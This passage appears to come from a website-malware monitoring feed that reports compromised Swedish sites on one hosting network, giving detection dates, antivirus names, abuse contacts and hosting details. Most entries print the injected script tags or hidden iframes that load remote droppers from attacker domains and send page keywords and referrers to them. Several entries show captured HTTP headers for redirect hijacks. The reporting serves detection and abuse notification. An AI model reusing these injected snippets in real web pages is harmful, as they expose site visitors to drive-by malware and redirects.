x=0,y=metas.length;x&lt;y;x++){if(metas[x].name.toLowerCase()==&quot;keywords&quot;){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&amp;]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&amp;se_referrer='+encodeURIComponent(document.referrer)+'&amp;source='+encodeURIComponent(window.location.host))+'&quot;&gt;<br><br>Offensive url: http://christmas168.com/js/jquery.min.php?c_utt=J18171&amp;c_utm=<br>Url is blacklisted in Google Safe Browsing<br><br>allt-om-turkiet.se is on 83.218.90.133<br>ASN for 83.218.90.133: 29468<br>Abusix contact information: abuse@pin.se (information only)<br>83.218.90.133 corresponds with web.icwebb.se<br>Abuse.net does not have any reliable address for web.icwebb.se<br>Found address in whois: abuse@pin.se1467365102http://harborttagning.nu/ (83.218.90.133) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://christmas168.com/js/jquery.min.php?c_utt=J18171&amp;c_utm='+encodeURIComponent('http://christmas168.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x&lt;y;x++){if(metas[x].name.toLowerCase()==&quot;keywords&quot;){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&amp;]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&amp;se_referrer='+encodeURIComponent(document.referrer)+'&amp;source='+encodeURIComponent(window.location.host))+'&quot;&gt;<br><br>Offensive url: http://christmas168.com/js/jquery.min.php?c_utt=J18171&amp;c_utm=<br>Url is blacklisted in Google Safe Browsing<br><br>harborttagning.nu is on 83.218.90.133<br>ASN for 83.218.90.133: 29468<br>Abusix contact information: abuse@pin.se (information only)<br>83.218.90.133 corresponds with web.icwebb.se<br>Abuse.net does not have any reliable address for web.icwebb.se<br>Found address in whois: abuse@pin.se1467363530http://allt-om-turkiet.se/ (83.218.90.133) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://christmas168.com/js/jquery.min.php?c_utt=J18171&amp;c_utm='+encodeURIComponent('http://christmas168.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x&lt;y;x++){if(metas[x].name.toLowerCase()==&quot;keywords&quot;){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&amp;]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&amp;se_referrer='+encodeURIComponent(document.referrer)+'&amp;source='+encodeURIComponent(window.location.host))+'&quot;&gt;<br><br>Offensive url: http://christmas168.com/js/jquery.min.php?c_utt=J18171&amp;c_utm=<br>Url is blacklisted in Google Safe Browsing<br><br>allt-om-turkiet.se is on 83.218.90.133<br>ASN for 83.218.90.133: 29468<br>Abusix contact information: abuse@pin.se (information only)<br>83.218.90.133 corresponds with web.icwebb.se<br>Abuse.net does not have any reliable address for web.icwebb.se<br>Found address in whois: abuse@pin.se1467181595http://harborttagning.nu/ (83.218.90.133) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://motogiro-usa.com/js/jquery.min.php?c_utt=J18171&amp;c_utm='+encodeURIComponent('http://motogiro-usa.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x&lt;y;x++){if(metas[x].name.toLowerCase()==&quot;keywords&quot;){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&amp;]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&amp;se_referrer='+encodeURIComponent(document.referrer)+'&amp;source='+encodeURIComponent(window.location.host))+'&quot;&gt;<br><br>Offensive url: http://motogiro-usa.com/js/jquery.min.php?c_utt=J18171&amp;c_utm=<br>Url is blacklisted in Google Safe Browsing<br><br>harborttagning.nu is on 83.218.90.133<br>ASN for 83.218.90.133: 29468<br>Abusix contact information: abuse@pin.se (information only)<br>83.218.90.133 corresponds with web.icwebb.se<br>Abuse.net does not have any reliable address for web.icwebb.se<br>Found address in whois: abuse@pin.se1465887438http://allt-om-turkiet.se/ (83.218.90.133) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://motogiro-usa.com/js/jquery.min.php?c_utt=J18171&amp;c_utm='+encodeURIComponent('http://motogiro-usa.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x&lt;y;x++){if(metas[x].name.toLowerCase()==&quot;keywords&quot;){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&amp;]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&amp;se_referrer='+encodeURIComponent(document.referrer)+'&amp;source='+encodeURIComponent(window.location.host))+'&quot;&gt;<br><br>Offensive url: http://motogiro-usa.com/js/jquery.min.php?c_utt=J18171&amp;c_utm=<br>Url is blacklisted in Google Safe Browsing<br><br>allt-om-turkiet.se is on 83.218.90.133<br>ASN for 83.218.90.133: 29468<br>Abusix contact information: abuse@pin.se (information only)<br>83.218.90.133 corresponds with web.icwebb.se<br>Abuse.net does not have any reliable address for web.icwebb.se<br>Found address in whois: abuse@pin.se1465542839http://allt-om-turkiet.se/ (83.218.90.133) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://www.curiocabi.net/js/jquery.min.php?c_utt=J18171&amp;c_utm='+encodeURIComponent('http://www.curiocabi.net/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x&lt;y;x++){if(metas[x].name.toLowerCase()==&quot;keywords&quot;){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&amp;]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&amp;se_referrer='+encodeURIComponent(document.referrer)+'&amp;source='+encodeURIComponent(window.location.host))+'&quot;&gt;<br><br>Offensive url: http://www.curiocabi.net/js/jquery.min.php?c_utt=J18171&amp;c_utm=<br>Url is blacklisted in Google Safe Browsing<br><br>allt-om-turkiet.se is on 83.218.90.133<br>ASN for 83.218.90.133: 29468<br>Abusix contact information: abuse@pin.se (information only)<br>83.218.90.133 corresponds with web.icwebb.se<br>Abuse.net does not have any reliable address for web.icwebb.se<br>Found address in whois: abuse@pin.se1465278857http://harborttagning.nu/ (83.218.90.133) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://anapa111.ru/js/jquery.min.php?c_utt=I92930&amp;c_utm='+encodeURIComponent('http://anapa111.ru/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x&lt;y;x++){if(metas[x].name.toLowerCase()==&quot;keywords&quot;){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&amp;]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&amp;se_referrer='+encodeURIComponent(document.referrer)+'&amp;source='+encodeURIComponent(window.location.host))+'&quot;&gt;<br><br>Offensive url: http://anapa111.ru/js/jquery.min.php?c_utt=I92930&amp;c_utm=<br>Url is blacklisted in Google Safe Browsing<br><br>harborttagning.nu is on 83.218.90.133<br>ASN for 83.218.90.133: 29468<br>Abusix contact information: abuse@pin.se (information only)<br>83.218.90.133 corresponds with web.icwebb.se<br>Abuse.net does not have any reliable address for web.icwebb.se<br>Found address in whois: abuse@pin.se1461650648http://allt-om-turkiet.se/ (83.218.90.133) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://anapa111.ru/js/jquery.min.php?c_utt=I92930&amp;c_utm='+encodeURIComponent('http://anapa111.ru/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x&lt;y;x++){if(metas[x].name.toLowerCase()==&quot;keywords&quot;){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&amp;]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&amp;se_referrer='+encodeURIComponent(document.referrer)+'&amp;source='+encodeURIComponent(window.location.host))+'&quot;&gt;<br><br>Offensive url: http://anapa111.ru/js/jquery.min.php?c_utt=I92930&amp;c_utm=<br>Url is blacklisted in Google Safe Browsing<br><br>allt-om-turkiet.se is on 83.218.90.133<br>ASN for 83.218.90.133: 29468<br>Abusix contact information: abuse@pin.se (information only)<br>83.218.90.133 corresponds with web.icwebb.se<br>Abuse.net does not have any reliable address for web.icwebb.se<br>Found address in whois: abuse@pin.se1461650510http://bokaseminarium.nu/ (81.93.143.213) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://busymombusy.com/mnk2fjty.php?id=52045401&quot;&gt;<br><br>Offensive url: http://busymombusy.com/mnk2fjty.php?id=52045401<br>Url is blacklisted in Google Safe Browsing<br><br>bokaseminarium.nu is on 81.93.143.213<br>ASN for 81.93.143.213: 29468<br>Abusix contact information: abuse@pin.se (information only)<br>rDNS not found for 81.93.143.213<br>Found address in whois: abuse@pin.se abuse@nameisp.com1414655454http://etstelecom.se/ (81.93.152.121) - VirusAvast: infected by JSDownloaderBUJ Trj<br>Comodo: TrojWare.JS.Agent.gz<br><br>etstelecom.se is on 81.93.152.121<br>ASN for 81.93.152.121: 29468<br>Abusix contact information: abuse@pin.se (information only)<br>81.93.152.121 corresponds with cpanel01.web.pin.se<br>Abuse.net does not have any reliable address for cpanel01.web.pin.se<br>Found address in whois: abuse@pin.se abuse@infracom.se1393620492http://multiforum.se/directory.php (83.218.84.134) - MalwareOffensive html code:<br>&lt;iframe src=&quot;http://npanelsrv.info/&quot; width=&quot;1&quot; height=&quot;2&quot;&gt;<br><br>Offensive url: http://npanelsrv.info/<br>Url is blacklisted in Google Safe Browsing<br><br>multiforum.se is on 83.218.84.134<br>ASN for 83.218.84.134: 29468<br>Abusix contact information: abuse@infracom.se (information only)<br>83.218.84.134 corresponds with mail2.popadvert.com<br>Abuse.net does not have any reliable address for mail2.popadvert.com<br>Found address in whois: abuse@infracom.se1375856835http://multiforum.se/directory.php (83.218.84.134) - MalwareOffensive html code:<br>&lt;iframe src=&quot;http://npanelsrv.info/&quot; width=&quot;1&quot; height=&quot;2&quot;&gt;<br><br>Offensive url: http://npanelsrv.info/<br>Url is blacklisted in Google Safe Browsing<br><br>multiforum.se is on 83.218.84.134<br>ASN for 83.218.84.134: 29468<br>Abusix contact information: abuse@infracom.se (information only)<br>83.218.84.134 corresponds with mail2.popadvert.com<br>Abuse.net does not have any reliable address for mail2.popadvert.com<br>Found address in whois: abuse@infracom.se1375424523http://www.albemarleboats.se/wp-content/themes/multipress/js/all.js.php?post=444 (81.93.152.121) - VirusComodo: TrojWareJSAgentgz<br>NOD32: JSAgentNGM trojan<br><br>www.albemarleboats.se is on 81.93.152.121<br>ASN for 81.93.152.121: 29468<br>Abusix contact information: abuse@infracom.se (information only)<br>81.93.152.121 corresponds with cpanel01.web.pin.se<br>Abuse.net does not have any reliable address for cpanel01.web.pin.se<br>Found address in whois: abuse@infracom.se1375191751http://www.albemarleboats.se/wp-content/themes/multipress/js/all.js.php (81.93.155.140) - VirusAvast: JSDownloaderBUJ Trj<br>Comodo: TrojWareJSAgentgz<br>NOD32: JSAgentNGM trojan<br><br>www.albemarleboats.se is on 81.93.155.140<br>ASN for 81.93.155.140: 29468<br>Abusix contact information: abuse@infracom.se (information only)<br>81.93.155.140 corresponds with www13.sweweb.net<br>Abuse.net does not have any reliable address for www13.sweweb.net<br>Found address in whois: abuse@infracom.se1374560788http://www.albemarleboats.se/wp-content/themes/multipress/js/all.js.php (81.93.155.140) - VirusAvast: JSDownloaderBUJ Trj<br>Comodo: TrojWareJSAgentgz<br>NOD32: JSAgentNGM trojan<br><br>www.albemarleboats.se is on 81.93.155.140<br>ASN for 81.93.155.140: 29468<br>Abusix contact information: abuse@infracom.se (information only)<br>81.93.155.140 corresponds with www13.sweweb.net<br>Abuse.net does not have any reliable address for www13.sweweb.net<br>Found address in whois: abuse@infracom.se1374051732http://www.albemarleboats.se/wp-content/themes/multipress/js/all.js.php (81.93.155.140) - VirusAvast: JSDownloaderBUJ Trj<br>Comodo: TrojWareJSAgentgz<br>NOD32: JSAgentNGM trojan<br><br>www.albemarleboats.se is on 81.93.155.140<br>ASN for 81.93.155.140: 29468<br>Abusix contact information: abuse@infracom.se (information only)<br>81.93.155.140 corresponds with www13.sweweb.net<br>Abuse.net does not have any reliable address for www13.sweweb.net<br>Found address in whois: abuse@infracom.se1371535226http://www.albemarleboats.se/wp-content/themes/multipress/js/all.js.php (81.93.155.140) - VirusAvast: JSDownloaderBUJ Trj<br>Comodo: TrojWareJSAgentgz<br>NOD32: JSAgentNGM trojan<br><br>www.albemarleboats.se is on 81.93.155.140<br>ASN for 81.93.155.140: 29468<br>Abusix contact information: abuse@infracom.se (information only)<br>81.93.155.140 corresponds with www13.sweweb.net<br>Abuse.net does not have any reliable address for www13.sweweb.net<br>Found address in whois: abuse@infracom.se1371191005http://bta-agencies.se/ (81.93.152.95) - VirusKaspersky: TrojanJSRedirectorzf<br><br>bta-agencies.se is on 81.93.152.95<br>ASN for 81.93.152.95: 29468<br>Abusix contact information: abuse@infracom.se (information only)<br>81.93.152.95 corresponds with srv02.cpanel.pin.se<br>Abuse.net does not have any reliable address for srv02.cpanel.pin.se<br>Found address in whois: abuse@infracom.se1369033563http://www.albemarleboats.se/wp-content/themes/multipress/js/all.js.php (81.93.155.140) - VirusNOD32: JSAgentNGM trojan<br><br>www.albemarleboats.se is on 81.93.155.140<br>ASN for 81.93.155.140: 29468<br>Abusix contact information: abuse@infracom.se (information only)<br>81.93.155.140 corresponds with www13.sweweb.net<br>Abuse.net does not have any reliable address for www13.sweweb.net<br>Found address in whois: abuse@infracom.se1366963059http://flashguru.se/ (81.93.152.95) - Header-hijackingAttacked url: http://flashguru.se/<br>Attack type: Header hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Tue, 12 Feb 2013 01:10:45 +0000<br><br>Hijacking with http header 'Refresh', redirecting visitors to http://algerie-service.com/ads<br><br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: flashguru.se <br>Referer: http://www.google.com/search?q=flashguru.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Date: Tue, 12 Feb 2013 01:14:44 GMT <br>Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.32 mod_qos/9.68 mod_perl/2.0.5 Perl/v5.8.8 <br>X-Powered-By: PHP/5.3.6 <br>Refresh: 25; url=&quot;http://algerie-service.com/ads&quot; <br>P3P: CP=&quot;NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM&quot; <br>Set-Cookie: ab25073b7cdfd67a3de85bd0818c59db=18263789840e93537cd99c6daa3dff82; path=/ <br>Connection: close <br>Content-Type: text/html<br><br>flashguru.se is on 81.93.152.95<br>ASN for 81.93.152.95: 29468<br>Abusix contact information: abuse@infracom.se (information only)<br>81.93.152.95 corresponds with srv02.cpanel.pin.se<br>Abuse.net does not have any reliable address for srv02.cpanel.pin.se<br>Found address in whois: abuse@infracom.se1360649666http://studio-glamour.se/ (81.93.152.95) - Header-hijackingAttacked url: http://studio-glamour.se/<br>Attack type: Header hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Thu, 07 Feb 2013 14:51:56 +0000<br><br>Hijacking with http header 'Refresh', redirecting visitors to http://bluehost-dz.com/done<br><br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: studio-glamour.se <br>Referer: http://www.google.com/search?q=studio-glamour.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Date: Thu, 07 Feb 2013 14:55:40 GMT <br>Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.32 mod_qos/9.68 mod_perl/2.0.5 Perl/v5.8.8 <br>X-Powered-By: PHP/5.3.6 <br>Refresh: 25; url=&quot;http://bluehost-dz.com/done&quot; <br>P3P: CP=&quot;NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM&quot; <br>Expires: Mon, 1 Jan 2001 00:00:00 GMT <br>Cache-Control: post-check=0, pre-check=0 <br>Pragma: no-cache <br>Set-Cookie: e1708d188fb5b92d5fcdf8675a2ba4ce=a44dd08d9b75928621e8b235089b4765; path=/ <br>Set-Cookie: lang=deleted; expires=Wed, 08-Feb-2012 14:55:39 GMT; path=/ <br>Set-Cookie: jfcookie=deleted; expires=Wed, 08-Feb-2012 14:55:39 GMT; path=/ <br>Set-Cookie: jfcookie[lang]=deleted; expires=Wed, 08-Feb-2012 14:55:39 GMT; path=/ <br>Set-Cookie: stdglamour_tpl=stdglamour; expires=Tue, 28-Jan-2014 14:55:40 GMT; path=/ <br>Set-Cookie: virtuemart=a44dd08d9b75928621e8b235089b4765 <br>Set-Cookie: virtuemart=a44dd08d9b75928621e8b235089b4765 <br>Last-Modified: Thu, 07 Feb 2013 14:55:41 GMT <br>Connection: close <br>Content-Type: text/html; charset=utf-8<br><br>studio-glamour.se is on 81.93.152.95<br>ASN for 81.93.152.95: 29468<br>Abusix contact information: abuse@infracom.se (information only)<br>81.93.152.95 corresponds with srv02.cpanel.pin.se<br>Abuse.net does not have any reliable address for srv02.cpanel.pin.se<br>Found address in whois: abuse@infracom.se1360307653http://sibel.se/ (83.218.84.50) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://denybonfante.com/app/Menu.php&quot;&gt;<br><br>Offensive url: http://denybonfante.com/app/Menu.php<br>Url is blacklisted in Google Safe Browsing<br><br>sibel.se is on 83.218.84.50<br>ASN for 83.218.84.50: 29468<br>Abusix contact information: abuse@infracom.se (information only)<br>rDNS not found for 83.218.84.50<br>Found address in whois: abuse@infracom.se1360219778http://studio-glamour.se/ (81.93.152.95) - Header-hijackingAttacked url: http://studio-glamour.se/<br>Attack type: Header hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Tue, 05 Feb 2013 11:00:38 +0000<br><br>Hijacking with http header 'Refresh', redirecting visitors to http://shopforza.info/net<br><br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: studio-glamour.se <br>Referer: http://www.google.com/search?q=studio-glamour.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Date: Tue, 05 Feb 2013 11:04:14 GMT <br>Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.32 mod_qos/9.68 mod_perl/2.0.5 Perl/v5.8.8 <br>X-Powered-By: PHP/5.3.6 <br>Refresh: 25; url=&quot;http://shopforza.info/net&quot; <br>P3P: CP=&quot;NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM&quot; <br>Expires: Mon, 1 Jan 2001 00:00:00 GMT <br>Cache-Control: post-check=0, pre-check=0 <br>Pragma: no-cache <br>Set-Cookie: e1708d188fb5b92d5fcdf8675a2ba4ce=de5d6877e5046cce97cf94cf19a61384; path=/ <br>Set-Cookie: lang=deleted; expires=Mon, 06-Feb-2012 11:04:13 GMT; path=/ <br>Set-Cookie: jfcookie=deleted; expires=Mon, 06-Feb-2012 11:04:13 GMT; path=/ <br>Set-Cookie: jfcookie[lang]=deleted; expires=Mon, 06-Feb-2012 11:04:13 GMT; path=/ <br>Set-Cookie: stdglamour_tpl=stdglamour; expires=Sun, 26-Jan-2014 11:04:14 GMT; path=/ <br>Set-Cookie: virtuemart=de5d6877e5046cce97cf94cf19a61384 <br>Set-Cookie: virtuemart=de5d6877e5046cce97cf94cf19a61384 <br>Last-Modified: Tue, 05 Feb 2013 11:04:15 GMT <br>Connection: close <br>Content-Type: text/html; charset=utf-8<br><br>studio-glamour.se is on 81.93.152.95<br>ASN for 81.93.152.95: 29468<br>Abusix contact information: abuse@infracom.se (information only)<br>81.93.152.95 corresponds with srv02.cpanel.pin.se<br>Abuse.net does not have any reliable address for srv02.cpanel.pin.se<br>Found address in whois: abuse@infracom.se1360076497http://sibel.se/ (83.218.84.50) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://abrahamspath.org.uk/cb.php&quot;&gt;<br><br>Offensive url: http://abrahamspath.org.uk/cb.php<br>Url is blacklisted in Google Safe Browsing<br><br>sibel.se is on 83.218.84.50<br>ASN for 83.218.84.50: 29468<br>Abusix contact information: abuse@infracom.se (information only)<br>rDNS not found for 83.218.84.50<br>Found address in whois: abuse@infracom.se1359800094http://ivl-produkter.se/ (81.93.152.71) - Serp-hijackingAttacked url: http://ivl-produkter.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Mon, 07 Jan 2013 02:48:22 +0000<br><br>Visitors with referer are redirected to http://r-yonemura.jp/eagn.html?h=843149 <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: ivl-produkter.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Date: Mon, 07 Jan 2013 02:50:42 GMT <br>Server: Apache/2.2.9 (Debian) PHP/5.3.8-1~dotdeb.1 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g <br>X-Powered-By: PHP/5.3.8-1~dotdeb.1 <br>X-Pingback: http://ivl-produkter.se/xmlrpc.php <br>Vary: Accept-Encoding <br>Connection: close <br>Content-Type: text/html; charset=UTF-8 <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: ivl-produkter.se <br>Referer: http://www.google.com/search?q=ivl-produkter.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Found <br>Date: Mon, 07 Jan 2013 02:50:42 GMT <br>Server: Apache/2.2.9 (Debian) PHP/5.3.8-1~dotdeb.1 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g <br>Location: http://r-yonemura.jp/eagn.html?h=843149 <br>Vary: Accept-Encoding <br>Connection: close <br>Content-Type: text/html; charset=iso-8859-1<br><br>ivl-produkter.se is on 81.93.152.71<br>ASN for 81.93.152.71: 29468<br>Abusix contact information: abuse@infracom.se (information only)<br>81.93.152.71 corresponds with box63.pin.se<br>Abuse.net does not have any reliable address for box63.pin.se<br>Found address in whois: abuse@infracom.se1357538128